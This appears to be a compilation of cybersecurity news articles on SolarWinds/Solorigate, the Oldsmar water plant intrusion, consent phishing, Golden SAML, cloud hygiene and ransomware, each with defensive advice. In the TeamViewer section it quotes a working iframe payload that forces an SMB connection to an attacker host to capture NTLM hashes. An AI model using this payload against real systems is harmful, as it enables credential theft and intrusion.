Zero Trust Lesson

Zero Trust is one of the lessons learned as a result of the recent SolarWinds supply chain attack, according to Microsoft – one of the victims of the said supply chain attack.

In the blog post "Microsoft Internal Solorigate Investigation – Final Update” published on February 18, 2021, Microsoft Security Response Center (MSRC) Team admitted that the threat actor behind the SolarWinds supply chain attack was able to download a small subset of Azure components (subsets of service, security, identity), a small subset of Exchange components, and a small subset of Intune components.

SolarWinds Supply Chain Attack Background

In December 2020, SolarWinds reported to the U.S. Securities and Exchange Commission (SEC) that the supply chain attack on its system affected nearly 18,000 customers of SolarWinds Orion – a software used as a monitoring and management platform designed to simplify IT administration.

In a supply chain attack, an attacker accesses the source code of legitimate software and infects it with malicious code. Once this compromised software is distributed to customers, the customers' systems are compromised as well and a series of compromises follow. According to SolarWinds, the attacker inserted a malicious code within Orion which, if present and activated, "could potentially allow an attacker to compromise the server on which the Orion products run." Microsoft named this malicious code "Solorigate."

Last December, Microsoft, through the MSRC Team, admitted that it was one of the victims of the SolarWinds supply chain attack and the threat actor behind it was able to "view source code in a number of source code repositories." The December 2020 admission specified that the threat actor was able to view, while the latest February 2021 admission specified that the threat actor was able to download.

"We have now completed our internal investigation into the activity of the actor and want to share our findings, which confirm that we found no evidence of access to production services or customer data," MSRC Team said, in the latest report dubbed as the final update about Solorigate. "The investigation also found no indications that our systems at Microsoft were used to attack others."

Zero Trust

The MSRC Team said that Solorigate reinforced one key learning: Zero Trust.

The concept of Zero Trust has been around for nearly a decade. The term was first used in 2010 by John Kindervag, then the principal analyst at Forrester Research Inc. In his research and analysis of enterprises, Kindervag found that “trust” had become an essential part of the network. For Kindervag, trust is a major liability for enterprises’ networks that could result in failure over and over again in the years to come.

In the blog post "The Tao Of Zero Trust" Chase Cunningham, VP, Principal Analyst; Jeff Pollard, VP, Principal Analyst; and Stephanie Balaouras, VP, Group Director, all from Forrester Research said that the adoption of Zero Trust is based on these two factors:

"First, the cybersecurity industry has hit an inflection point wherein the massive spend to prove the negative of ‘good security’ is drying up.

"Second, CEOs and board leadership for enterprises are tired of the technical talk and miscommunication around cybersecurity operations. Zero Trust is simple in name, comprehensive in its approach, and realistic in the acceptance of the inherent failures that plague enterprises from the second they start sending electrons."

MSRC Team defined Zero Trust as a "transition from implicit trust –assuming that everything inside a corporate network is safe – to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data."

Verify explicitly, least privileged access, and assume breach are three principles of Zero Trust. Verify explicitly means that it's always important to authenticate and authorize based on all available data points. Least privileged access means that permissions are only granted to the appropriate environment and on appropriate devices to meet specific business goals. Assume breach, meanwhile, means that processes and systems must assume breach has already happened or soon will. 

In the blog post "Using Zero Trust principles to protect against sophisticated attacks like Solorigate," Alex Weinert, Identity Security Director at Microsoft, said that the threat actor behind Solorigate compromised identity environments with these three major vectors: compromised user accounts, compromised vendor accounts, and compromised vendor software. "In each of these cases, we can clearly see where the attacker exploited gaps in explicit verification," Weinertsaid.

Weinert further said that the threat actor behind Solorigate took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all.

Applying the lessons from the Solorigate attack and the principles of Zero Trust, Microsoft recommends enabling multi-factor authentication (MFA) to reduce account compromise probability by more than 99.9%. It's important to note that attackers, however, have their ways of bypassing MFA nowadays.

Microsoft also recommends to configure for Zero Trust using Zero Trust Deployment Guides and to look atIdentity workbook for Solorigate.

Remote Access Security Risks and Best Practices to Counter These Risks

The recent cyber incident in which someone tried to poison the water supply of the city of Oldsmar, Florida highlights the security risks of remote access.

Pinellas County Sheriff Bob Gualtieri, in a press conference held last week, said that someone remotely accessed one of the computers of the city’s water treatment system and increased the amount of sodium hydroxide to a level that could have caused serious harm to the city’s 15,000 residents.

A small concentration of sodium hydroxide is used by the city’s water treatment system to control the water acidity. The high concentration of this chemical, however, causes severe burns and permanent damage to any tissue that it comes in contact with. Gualtieri said that the city’s water supply wasn’t adversely affected as a supervisor, who was also working remotely, noticed the unauthorized change and immediately reverted the chemical concentration to the old level.

TeamViewer Vulnerability

Gualtieri told WIRED and Reuters that the threat actor who made the unauthorized change to the concentration of sodium hydroxide gained remote access to the water treatment plant's computer system via TeamViewer – an app that allows a user to gain access to computers and networks remotely. This app is specifically used for desktop sharing.

The security vulnerability, designated as CVE-2020-13699, in TeamViewer for Windows platform was discovered last year by Jeffrey Hofmann, security engineer at Praetorian. Hofmann said the affected versions were versions 8 to 15 of the TeamViewer for Windows platform.

“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>)that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” Hofmann said. “Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

An attacker exploiting this vulnerability could force a victim to send an NTLM authentication request and capture the hash for offline password cracking. In response to the disclosure made by Hofmann, TeamViewer issued updates to TeamViewer versions 8 to 15 for the Windows platform. "We implemented some improvements in URI handling relating to CVE 2020-13699,” TeamViewer said in a statement.

It’s unclear whether the updates issued by TeamViewer were applied by the concerned personnel of the city’s water treatment system. According to the Cybersecurity and Infrastructure Security Agency (CISA), early information indicates that it’s possible that TeamViewer may have been used to gain unauthorized access to the water treatment system. This, however, can’t be confirmed at present date, CISA said.

“TeamViewer, a desktop sharing software, is a legitimate popular tool that has been exploited by cyber actors engaged in targeted social engineering attacks, as well as large scale, indiscriminate phishing campaigns,” CISA said. “Desktop sharing software can also be used by employees with vindictive and/or larcenous motivations against employers. Beyond its legitimate uses, when proper security measures aren’t followed, remote access tools may be used to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs). TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to RATs.”

Other Poor Cybersecurity Practices

As a result of the cyber incident at Oldsmar's water treatment system, the State of Massachusetts issued a cybersecurity advisory for public water suppliers. The advisory issued by the State of Massachusetts said, "All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system.”

Microsoft ended its support for the Windows 7 operating system on January 14, 2020. End of support, in this case, means end of security updates and technical support. Users of Windows 7 Professional and Enterprise versions, however, can avail of the Extended Security Update (ESU) plan (paid per-device) until January 2023. It isn’t clear whether Oldsmar’s water treatment system availed of the ESU plan.

The cybersecurity advisory further said, “Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”

Cybersecurity Best Practices

While remote access comes with known risks, remote access has become a necessity as a result of the lockdown restrictions. There’s also an upside with remote access. In the case of the cyber incident at Oldsmar's water treatment system, the unauthorized change was immediately reversed due to remote access as well.

Here are some of the lessons learned out of the cyber incident at Oldsmar's water treatment system:

• Keep all software up to date. Attention should be given to the timely application of security updates of critical software, such as software that allows remote access.
• Train employees how to spot and block social engineering. In social engineering, employees are tricked into clicking something which could result in the exposure of login credentials.
• Use the latest version of the operating system (Windows 10, instead of Windows 7).
• Never allow employees to use only one password.
• Use multi-factor authentication (MFA) and virtual private network (VPN). The use of MFA and VPN ensures that in case malicious outsiders or malicious insiders have gotten hold of the employees’ passwords, they still have to overcome these two additional security defenses.
• Use a firewall – a network security device that monitors outgoing and incoming network traffic and either allows or blocks specific traffic based on a defined set of rules.

As a large number of the world’s workforce shifted to working from home, attackers have turned their attention to this new group of remote workforce by leveraging the cyberattack called “consent phishing” to gain access to valuable data in cloud services.

What Is Consent Phishing?

Consent phishing is a cyberattack in which an attacker lures a victim to click on a malicious app. This malicious app masquerades as a legitimate app, tricking the victim to give consent to such malicious app and giving the attacker access to the victim’s sensitive data or other resources.

In the blog post "Protecting your remote workforce from application-based attacks like consent phishing," Agnieszka Girling, Partner Group PM Manager at Microsoft warned about consent phishing. While each consent phishing attack tends to vary, Girling said, the basic steps typically follow these steps:

First, an attacker registers a malicious app with an OAuth 2.0 provider, such as Azure Active Directory.

Second, the malicious app is developed in such a way that it appears, at first glance, as legitimate through the use of the name and logo of a popular product.

Third, the attacker tricks a victim to click on a malicious link. The malicious link is delivered by email, website, or other techniques.

Fourth, the victim clicks the malicious link and is asked to grant the malicious app permissions.

Fifth, once the victim grants the malicious app permissions, the malicious app gets an authorization code which it redeems for an access token, and potentially a refresh token.

Sixth, the access token is then used to access a cloud service on behalf of the victim.

Consent phishing is also known as OAuth phishing as this type of cyberattack abuses the OAuth protocol – an authentication protocol that allows websites and applications to request limited access to a user's cloud account without the need for a password. With OAuth, instead of a password, an authorization token is used to authenticate.

Real-Life Example of Consent Phishing Attack

PhishLabs reported that an attacker used a malicious Microsoft 365 app to gain access to a victim’s legitimate Microsoft 365 account. According to PhishLabs, the attacker presented the link of the malicious Microsoft 365 app via a traditional phishing message impersonating an internal SharePoint and OneDrive file-share.

PhishLabs said that the link provided led to a Microsoft 365 legitimate login page. After the victim logged in or if previously logged in, the victim was then presented with the Microsoft 365 access permissions request. Access approval granted the attacker full control of the victim’s Microsoft 365 account.

According to PhishLabs, the Microsoft 365 app was created using the information of a legitimate organization. “This is likely due to the organization having been previously compromised, allowing attackers to leverage their development credentials in building the app,” PhishLabs said.

Cybersecurity Best Practices Against Consent Phishing

In consent phishing attacks, the typical remediation steps such as resetting passwords or requiring Multi-Factor Authentication (MFA) on accounts aren’t effective as the malicious apps are external to the organization.

According to Microsoft, consent phishing attacks “leverage an interaction model which presumes the entity that is calling the information is automation and not a human.”

Microsoft recommends the following measures to detect and remediate consent phishing attacks targeting your organization’s Microsoft cloud environment:

Detect Malicious Apps Using Alerts

OAuth policies can be set automatically to send notifications when an OAuth app meets certain criteria. For instance, an OAuth policy can be set to send a notification when an OAuth app requires high permissions and was authorized by more than 50 users.

Detect Malicious Apps by Hunting

In detecting malicious apps by hunting, OAuth apps are reviewed based on suspicious name or suspicious publisher.

“Misleading names, such as foreign letters that resemble Latin letters, could indicate an attempt to disguise a malicious app as a known and trusted app,” Microsoft said. “Misleading publisher names, such as foreign letters that resemble Latin letters, could indicate an attempt to disguise a malicious app as an app coming from a known and trusted publisher.”

Remediation

Once it’s determined that the OAuth app is malicious, the following remediations can be undertaken:

• Revoking the malicious app’s permission in the Azure Active Directory Portal by navigating to the affected user in the Azure Active Directory User blade, selecting applications, selecting the illicit application, and clicking Remove in the drill down
• Revoking the OAuth consent grant with PowerShell by following the steps in Remove-AzureADOAuth2PermissionGrant
• Revoking the Service App Role Assignment with PowerShell by following the steps in Remove-AzureADServiceAppRoleAssignment
• Disabling sign-in for the affected account
• Turning integrated applications off for your organization’s tenancy

How to Catch Golden SAML-Type Attacks

The supply chain attack on SolarWinds exposes the effectiveness of a cyberattack method called “Golden SAML.”

SolarWinds Supply Chain Attack Background

In December 2020, FireEye disclosed its discovery of the supply chain attack on SolarWinds product Orion – monitoring and management platform designed to simplify IT administration.

In the supply chain attack on SolarWinds Orion, attackers gained access to the source code of Orion; maliciously changed the code; and said malicious code was made part of the official updates released to the customers of SolarWinds. The malicious updates allowed the SolarWinds attackers to gain initial access to the networks of the customers of SolarWinds Orion. The attack affected nearly 18,000 customers of SolarWinds Orion.

Among the companies that admitted that they’ve been impacted by the SolarWinds supply chain attack are FireEye and Microsoft. As a result of the SolarWinds supply chain attack, FireEye disclosed that the attackers stole its Red Team assessment tools which leverage known Common Vulnerabilities and Exposures (CVEs) to test and validate clients’ cybersecurity posture. Microsoft, meanwhile, admitted that attackers were able to view the company’s “source code in a number of source code repositories.”

What Is Golden SAML?

Golden SAML is an attack vector that was discovered back in 2017 by CyberArk Labs. One of the attack methods used by the attackers after gaining initial access to the networks of SolarWinds Orion customers is the Golden SAML. The use of Golden SAML in the SolarWinds supply chain attack is the first documented use of Golden SAML since the 2017 discovery.

Golden SAML allows attackers who gained initial access to a victim’s network such as in the case of SolarWinds supply chain attack to maintain persistence and gain access to the different services used by the victim in a convenient and stealth manner. “Golden SAML is a technique that allows attackers, once they got privileged access to the victim’s network, to impersonate almost any identity in the organization and acquire any type of privilege across almost all services of the organization (this depends on what services in the organization use SAML as their authentication protocol),” CyberArk Labs said in the latest blog post "Golden SAML Revisited: The Solorigate Connection .”

As described by CyberArk Labs, Golden SAML is basically a forged SAML. Short for Security Assertion Markup Language, SAML enables web browser Single Sign-On (SSO). SAML 2.0, first introduced in 2005, is the current standard version of the SAML protocol. 

With SSO, a user only has to enter their login credentials once and the user is then given access to cloud services that support SAML authentication such as Microsoft Azure or Amazon Web Services (AWS). “In a golden SAML attack, attackers can gain access to any application that supports SAML authentication (e.g. Azure, AWS, vSphere, etc.) with any privileges they desire and be any user on the targeted application (even one that is non-existent in the application in some cases),” CyberArk Labs said.

On the part of an attacker, CyberArk Labs said, Golden SAML has the following advantages:

• It can be generated from practically anywhere. There’s no need to be a part of a domain.
• It’s effective even when two-factor authentication (2FA) is enabled.
• The token-signing private key isn’t renewed automatically.
• Changing a user’s password won’t affect the generated SAML.

To perform the Golden SAML attack, CyberArk Labs said, the following requirements are needed: token-signing private key, IdP public certificate, IdP name, and Role name (role to assume). CyberArk Labs added that in order to get the private key, tools such as Mimikatz can be used.

According to FireEye, the supply chain attack on SolarWinds enabled the attackers to execute a customized Cobalt Strike – a commercial penetration testing tool that’s marketed as a “software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors." One of the tools included in Cobalt Strike is Mimikatz, a tool that’s capable of exploiting Windows Single Sign-On (SSO) functionality to harvest credentials.

Even though the Golden SAML has been a known attack vector since 2017, this hasn’t been addressed by the concerned vendors using the SAML 2.0 protocol as Golden SAML isn’t treated as a security vulnerability as an attacker needs to have domain admin access in order to perform it. The case in point is the SolarWinds supply chain attack in which the attackers already gained domain admin access.

According to FireEye, the SolarWinds supply chain attackers were observed targeting on-premises Active Directory Federation Services servers with the goal of obtaining the token-signing certificate to forge SAML tokens. Active Directory Federation Services is a software component developed by Microsoft that runs on Windows Server operating systems to provide users with Single Sign-On access to systems and applications.

Cybersecurity Best Practices

One of the cybersecurity measures to prevent a Golden SAML attack is by deploying a Privileged Access Management (PAM) solution – referring to a solution that helps manage, monitor, and secure privileged access to critical assets. It’s also important to monitor for suspicious SAML tokens such as those with an unusually long life.

In case there’s enough evidence that attackers have already accessed your organization’s Active Directory Federation Services servers, the following steps need to be done:

1. Issue new certificates on the Active Directory Federation Services servers and synchronize them to Azure Active Directory; and
2. Revoke all existing refresh tokens for the Microsoft 365 tenant.

Hunt for Earliest Artifacts of Compromise

Three of Microsoft’s cyber defense teams recently published their collective findings on how threat actors got away in viewing the company’s crown jewel: Microsoft source code.

In the blog post "Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop," three of Microsoft’s cyber defense teams, Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center, and Microsoft Cyber Defense Operations Center revealed new details on how threat actors were able to view the company’s source code.

Last December 31st, Microsoft admitted that one internal account had been compromised and used to view source code in a number of source code repositories. "The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made," Microsoft said.

Background

Microsoft earlier admitted that it was one of the victims of the Solarwinds supply chain attack. Microsoft is one of the thousands of Solarwinds’ clients that unwittingly downloaded the Solarwinds update that was maliciously modified with attached malicious software (malware) called "Solorigate" to further compromise the networks of those that downloaded the poisoned update.

In a report to the U.S. Securities and Exchange Commission, Solarwinds said, "SolarWinds currently believes the actual number of customers that may have had an installation of the [SolarWinds] Orion products that contained this vulnerability to be fewer than 18,000."

Microsoft provided the following timeline in which the attackers were able to compromise SolarWinds update:

Sept. 4, 2019: Attackers start assessing SolarWinds

Sept. 12, 2019: Attackers start injecting test code

Nov. 4, 2019: Attackers stop injecting test code

Feb. 20, 2020: Solorigate malware backdoor is compiled and deployed

March 2020: Estimated start of distribution of Solorigate malware backdoor

May 2020: Estimated start of actual hands-on-keyboard attacks

June 4, 2020: Attackers remove malware from SolarWinds build environment

Dec. 12, 2020: Solorigate malware supply chain attack disclosed

How the Attack Transpired

According to FireEye, one of the victims of the SolarWinds supply chain attack, the supply chain attack on SolarWinds enabled the attackers to execute a customized Cobalt Strike.

Cobalt Strike is a publicly available penetration testing tool that’s marketed as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike’s post-exploit capabilities include tools such as Mimikatz and Metasploit.

Mimikatz is a tool that’s capable of obtaining plaintext Windows account logins and passwords. Mimikatz also comes with many other features that test the security of networks.

Metasploit, meanwhile, is another penetration testing tool popularly used by both attackers and defenders. With Metasploit, attackers just pick a target, pick an exploit, and pick a payload to drop.

"One missing link in the complex Solorigate attack chain is the handover from the Solorigate DLL backdoor to the Cobalt Strike loader," Microsoft’s cyber defense teams said.

According to Microsoft’s cyber defense teams, the following tactics allowed the attackers to hid their malware and malicious actions:

1. Avoidance of Shared Indicators for Each Compromised Host

Each Cobalt Strike implant was assembled to be unique for every compromised computer and avoided any overlap and reuse of file name, folder name, export function names, HTTP requests, C2 domain/IP, file metadata, and timestamp.

2. Camouflage and Blending into the Environment

Tools used by the attackers, including the legitimate tool called "ADFIND" (a search utility that can be used to query the Active Directory), were always renamed and placed in folders that imitated existing programs and files already present on the compromised computer. 

3. Disabling of Event Logging

Event logging captures network activities such as login sessions, account lockouts, and failed password attempts. Prior to conducting hands-on keyboard activity, the attackers disabled event logging through the use of a tool called "AUDITPOL." The attackers enabled event logging after conducting hands-on keyboard activity.

4. Firewall Rules Modifications

Prior to running network enumeration activities, the attackers prepared special firewall rules to lessen outgoing packets for certain protocols. After running network enumeration activities, the attackers removed the special firewall rules.

5. Disabling of Certain Security Services

Prior to conducting lateral movement activities, the attackers first disabled certain security services. Lateral movement refers to activities that are conducted by attackers after gaining access to the victim’s network.

Attackers, in this case, gained initial access to the victims’ networks via the poisoned Solarwinds update. Post initial access activities are typically done in search of sensitive data and other high-value assets.

6. Timestomping

Microsoft’s cyber defense teams believed that the attackers used timestomping. In timestomping, attackers change the timestamps of a file – referring to the access, create, and change times of a file. The goal of timestomping is to derail forensic investigators or file analysis tools.

If All Else Fails

To date, the identities of the attackers behind the Solarwinds supply chain attack that spiraled into the compromise of other networks such as Microsoft and FireEye remain inconclusive.

One takeaway from this supply chain attack is the need for network segmentation. If all else fails, one way to protect your organization’s crown jewels is to implement network segmentation.

In network segmentation, your organization’s network is divided into sub-networks so that in case one sub-network is compromised, the other sub-networks won’t be affected.

Weak Cyber Hygiene Practices Behind Successful Cloud Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert detailing the weak cyber hygiene practices behind successful cyberattacks against various organizations’ cloud environments.

In the alert "Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services," CISA said that based on data derived exclusively from several of its incident response engagements, it’s aware of several recent successful cyberattacks against various organizations’ cloud environments.

“Despite the use of security tools, affected organizations typically had weak cyber hygiene practices that allowed threat actors to conduct successful attacks,” CISA said.

Weak Cyber Hygiene Practices

According to CISA, successful cyberattacks against various organizations’ cloud environments frequently occur when victim organizations’ allowed employees to work from home and used a mixture of personal devices and corporate laptops to access organizations’ cloud environments.

Here are some of the weak cyber hygiene practices behind successful cyberattacks against various organizations’ cloud environments based on CISA’s alert:

Phishing Attacks

CISA said threat actors are using phishing emails to harvest credentials for users’ cloud service accounts. In phishing emails, threat actors weaponize the traditional emails for cyberattacks.

These phishing emails, CISA said, contain malicious links that appear on a first glance as legitimate links to file hosting service account login. Login details entered on these malicious links were then stolen by threat actors and used to login to victims’ legitimate file hosting service accounts. From these hijacked legitimate file hosting service accounts, threat actors then sent emails from the victims’ accounts to steal login details for other accounts within the organization, CISA said. 

Open Port 80

The CISA alert found that threat actors are exploiting open port 80. According to the agency, open port 80 was exploited even though an organization’s terminal server was located within a firewall.

Due to remote work posture, CISA said the terminal server was configured with port 80 open to allow remote employees to access it, leaving the organization’s network vulnerable.

The agency added that this open port 80 was exploited by launching brute force attacks. In brute force attacks, threat actors use the trial-and-error method to guess the correct username and password combination.

MFA Bypass via Pass-the-Cookie Attack 

According to CISA, threat actors successfully signed into a cloud account with proper multi-factor authentication (MFA). “In this case, CISA believes the threat actors may have used browser cookies to defeat MFA with a ‘pass-the-cookie’ attack,” the agency said.

Authentication cookies are commonly used by cloud-based services to avoid frequently asking users to re-enter their credentials. Cookies are often valid for an extended period of time, even when the cloud-based service isn’t actively used.

“After the cookie is obtained through Steal Web Session Cookie, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active,” MITRE said. “Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.”

Taking Advantage of Keyword Search Rule and Email Forwarding Rule

After gaining access into victims’ cloud service accounts, CISA said threat actors take advantage of keyword search rule and email forwarding rule.

Keyword search and email forwarding are two features found in many cloud service accounts. These features can be applied manually or automatically. While these two features are handy, these two pose a security risk due to the potential disclosure of information.

According to CISA, threat actors modified existing automated keyword search rules to search victims’ email messages for several finance-related keywords. The agency added that threat actors modified existing automated email forwarding rules and forward the emails to the threat actors’ accounts.

Mitigating Measures to Strengthen Cloud Security Practices

Here are some of the recommended mitigating measures to strengthen cloud security practices:

Phishing Scams Education

Train employees about phishing emails by making them aware how these emails are being delivered.

Secure Over-all Network from Open Port 80 

One way to mitigate the adverse effect of an open port 80 is by implementing network segmentation. In network segmentation, your organization’s network is divided into sub-networks so that in case one sub-network is compromised the other sub-networks won’t be affected.

Mitigating Measures Against Pass-the-Cookie Attacks

Mitigating measures against pass-the-cookie attacks includes MFA that uses the target login domain as part of the negotiation protocol. Software configuration is another mitigating measure against pass-the-cookie attacks. In software configuration, browsers are configured to regularly delete persistent cookies.

Mitigating Measures Against Exploitation of Keyword Search Rule and Email Forwarding Rule

Mitigating measures against exploitation of keyword search rule and email forwarding rule include routinely reviewing these rules for any signs of malicious changes.

In the case of Microsoft 365, outbound spam filter policies are available to control automatic forwarding to external recipients. One of the available outbound spam filter policies is the “Off” option which disables automatic external forwarding and will result in a non-delivery report to the sender.

Implement Zero Trust Security Strategy

Zero Trust assumes that no one should be trusted by default within and outside the network. Zero trust security strategy includes the principle of least privilege and the principle of explicit verification.

In implementing the principle of least privilege, right access at the right time is only given to those who need it. Explicit verification, meanwhile, includes MFA that requires users using new devices and from new locations to respond to an MFA challenge.

Ransomware Attacks on Healthcare Organizations Globally Increase by 45%, Study Shows

A recent report from Check Point showed that since November 2020, ransomware attacks targeting healthcare organizations globally has increased by 45%.

In the report "Attacks targeting healthcare organizations spike globally as COVID-19 cases rise again," Check Point said that the spike in the ransomware attacks targeting healthcare organizations globally more than double the overall increase in cyberattacks across all industry sectors worldwide seen during the same period. According to Check Point, the main ransomware variant used in the ransomware attacks was Ryuk, followed by Sodinokibi.

What Is Ransomware?

Ransomware is a type of malicious software (malware) that blocks victims from assessing their computer systems or files and demands from the victims ransom payment for victims to re-gain access to the computer systems or files. Ransomware attackers also demand a separate ransom payment in exchange for the non-publication of data stolen in the course of the ransomware attack.

Ryuk and Sodinokibi Ransomware

Ryuk ransomware is a cyber threat that has been targeting organizations, specifically hospitals, businesses, and government institutions since 2018. This ransomware was first observed in the wild in August 2018.

Code comparison analysis of Ryuk ransomware and Hermes ransomware showed that both are generally equal, giving credence to the theory that the developer of Ryuk has access to the Hermes source code. Hermes ransomware was responsible for the money heist of a Taiwanese bank in October 2017.

Hermes is called a “pseudo-ransomware” – referring to ransomware that uses a ransomware attack as a cover to distract its main goal: stealing money. In the money heist of a Taiwanese bank in 2017, the Hermes ransomware attack was perfectly timed at the time when money was stolen from the bank.

The group behind Ryuk ransomware demands that the ransom payment should be in the form of the cryptocurrency bitcoin. After tracing bitcoin transactions for the known addresses attributable to Ryuk, researchers from HYAS and Advanced Intelligence reported that the group behind Ryuk earned more than $150,000,000.

“Ryuk receives a significant amount of their ransom payments from a well-known broker that makes payments on behalf of the ransomware victims,” researchers from HYAS and Advanced Intelligence said. “These payments sometimes amount to millions of dollars and typically run in the hundreds of thousands range.”

Sodinokibi, also known as REvil, meanwhile, is a type of ransomware that was first observed in April 2019. Code comparison analysis of Sodinokibi and another ransomware called “GandCrab” showed that the two shared a lot of similarities, indicating the developer of Sodinokibi had access to the GandCrab source code.

Ransomware Similarities

Both Ryuk and Sodinokibi encrypt important files in the compromised computer, locking out users from their files. These two demand a ransom to decrypt or unlock these files.

It’s now a known fact that during the course of the ransomware attack, Ryuk and Sodinokibi also steal victims’ files before encrypting them. Stolen data is then used for “double-extortion” attempt, that is, in addition to ransom payment to unlock the locked files, attackers demand from victims to pay another ransomware payment for the stolen files, threatening victims that failure to pay this second ransom payment would lead to the publication of the stolen files.

In November 2020, K12 Inc., now known as Stride, Inc., a company that provides online education, admitted that it was a victim of a ransomware attack. Open-sourced reports showed that Ryuk ransomware hit K12 Inc.

In a statement, K12 Inc. said, “We have already worked with our cyber insurance provider to make a payment to the ransomware attacker, as a proactive and preventive step to ensure that the information obtained by the attacker from our systems will not be released on the Internet or otherwise disclosed.”

Ryuk and Sodinokibi are part of the ransomware families called “Ransomware-as-a-Service (RaaS)”. In RaaS, one group maintains the ransomware code, and another group, known as affiliates, spreads the ransomware.

Cybersecurity Best Practices Against Ransomware Attacks

Both Ryuk and Sodinokibi are commonly spread via very targeted means such as RDP and spear phishing.

RDP, short for Remote Desktop Protocol, is a proprietary protocol developed by Microsoft which provides Windows user to connect to another Windows computer. In the blog post "Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks," Microsoft Defender Security Research Team said that RDP is an attractive target for threat actors as this presents a simple and effective way to gain access to a network, and conduct many follow-on activities such as ransomware attack.

Microsoft Defender Security Research Team said that threat actors often gain access to RDP through brute-force attack – referring to the trial-and-error method of guessing the correct username and password combination. Spear phishing, meanwhile, weaponizes an email against specific and well-researched targets. A spear-phishing email masquerades as coming from a trustworthy source.

Traditional spear-phishing emails attached malicious documents, for instance, a zip file. Modern-day spear-phishing emails come with malicious documents that are hosted on legitimate sites such as Dropbox, OneDrive, or Google Drive.

To protect RDP from brute-force attacks and ultimately ransomware attacks, use strong passwords, multi-factor authentication, virtual private networks (VPNs), and other security protections. Spear phishing prevention, meanwhile, includes phishing simulation tests, and an established process for users to report suspicious emails to the IT security team.

It’s also important to implement the 3-2-1 backup rule and network segmentation in case attackers breach your organization’s network.

The 3-2-1 backup rule means that at least 3 copies of critical data must be kept, with 2 copies in different media and one copy offsite. Network segmentation, meanwhile, refers to the practice of dividing your organization’s network into sub-networks so that in case something happens to one sub-network, the other sub-networks won’t be affected. 

A Lookback of the Cybersecurity Threats in 2020

The world dramatically changed in 2020. The abrupt work from home shift to anything online such as online shopping opened up a plethora of cybersecurity threats at a scale never seen before.

Most Notable Cybersecurity Threats in 2020

Here are some of the notable cybersecurity threats in 2020:

1. Threats Associated with Collaboration Apps

The work from home shift gave rise to the demand for collaboration tools such as Microsoft Teams, Slack, and Zoom. In 2020, threat actors turned their attention to these collaboration tools.

In 2020, the term “Zoombombing” was coined. This term refers to uninvited threat actors viewing Zoom meetings or sharing pornographic images and content.

Last year, threat actors leveraged association to Microsoft Teams – referring to the communication platform developed by Microsoft which features chat, videoconferencing, and file storage. In October 2020, Abnormal Security reported that up to 50,000 emails were observed spoofing employee emails and impersonating Microsoft Teams.

“The email pretends to be a Microsoft Teams notification email notifying the recipient that they have received messages and their teammates are trying to reach them,” Abnormal Security said. “The link landing page also looks convincingly like a Microsoft login page with the start of the URL containing ‘microsftteams’, lending further credence.”

2. Remote-Working Tools Exploitation

An IBM study released in June 2020 showed that 83% of employees were provided little to no ability to work from home prior to the sudden work from home shift. The IBM study further found that 53% of employees used their personal laptops and computers for business operations, while 61% also said their employer hasn't provided tools to properly secure those devices.

In 2020, threat actors actively exploited remote-working services such as virtual private network (VPN) services. In addition to masking internet protocol (IP) address so that online actions are virtually untraceable, VPN services promise secure and encrypted connections.

Security researchers, however, discovered security vulnerabilities in many VPN services. Even as VPN service vendors released patches fixing these security loopholes, many users delay the application of these patches, leading threat actors to exploit these unpatched security vulnerabilities.

In April 2020, the Canadian Centre for Cyber Security and U.S. Cybersecurity and Infrastructure Security Agency issued separate alerts warning organizations about the continued exploitation of the security vulnerability in Pulse Secure VPN, in particular, CVE-2019-11510 – a security vulnerability that allows a remote, unauthenticated attacker to compromise a vulnerable Pulse Secure VPN server, allowing an attacker to gain access to all active users and their plain-text credentials.

3. E-Commerce Threats

Among the effects of the lockdown measures in 2020 has been a huge spike in e-commerce business. Imperva reported that web traffic to retail sites spiked by as much as 28% on the weekly average. In “The State of Security within E-commerce,” Imperva reported that among the cyber threats faced by e-commerce businesses in 2020 were DDoS attacks and bad bots.

DDoS, short for distributed denial-of-service, refers to a cyberattack that attempts to disrupt the normal traffic of online resources such as websites, overwhelming the target or its surrounding infrastructure with a flood of internet traffic. DDoS attacks are launched by hijacking multiple computer systems, including Internet of Things (IoT), as sources of attack traffic.

According to Imperva, it monitored an average of eight application layer DDoS attacks a month against retail sites as lockdown measures led to an increase in demand for online shopping.

Bad bots, meanwhile, refer to software applications that run automated tasks over the internet for malicious purposes, for example, automatically scanning websites for software vulnerabilities and exploiting these vulnerabilities. According to Imperva, bad bots are the top threat to online retailers before and during the imposition of the lockdown measures.

4. Supply Chain Attack on SolarWinds

Year 2020 ends with one of the biggest cyberattacks: the supply chain attack on SolarWinds. On December 13, 2020, SolarWinds admitted that it fell victim to a supply chain attack.

In a supply chain attack, a threat actor gains access to your organization’s IT systems via an outside partner or third party that has access to your organization’s systems and data. According to SolarWinds, a threat actor gained access to its Orion Platform software source code and inserted the malicious software (malware) called “Sunburst.”

This malware ended up in the Orion Platform software update, specifically for versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1. According to SolarWinds, if present and activated, the Sunburst malware could potentially allow an attacker to compromise the server on which the Orion Platform software runs.

